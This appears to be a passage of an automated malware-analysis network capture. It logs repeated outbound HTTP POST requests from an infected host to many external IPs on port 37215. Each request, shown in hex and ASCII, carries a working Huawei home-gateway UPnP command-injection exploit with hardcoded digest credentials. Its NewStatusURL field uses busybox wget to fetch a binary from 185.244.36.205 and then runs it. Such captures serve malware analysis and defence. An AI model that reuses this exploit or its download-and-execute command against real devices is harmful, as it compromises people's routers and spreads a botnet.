                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1626192.168.2.1542958222.140.242.21037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645948887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1627192.168.2.1546924121.9.136.3037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645952940 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1628192.168.2.155922231.125.14.11737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645953894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1629192.168.2.1536000138.193.154.22837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645982027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1630192.168.2.1537972156.15.254.537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645986080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1631192.168.2.155873645.187.243.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646013021 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1632192.168.2.1540300222.221.217.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646013975 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1633192.168.2.154706631.83.44.20837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646028996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1634192.168.2.155201641.104.242.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646089077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1635192.168.2.1535094131.107.184.14137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646089077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
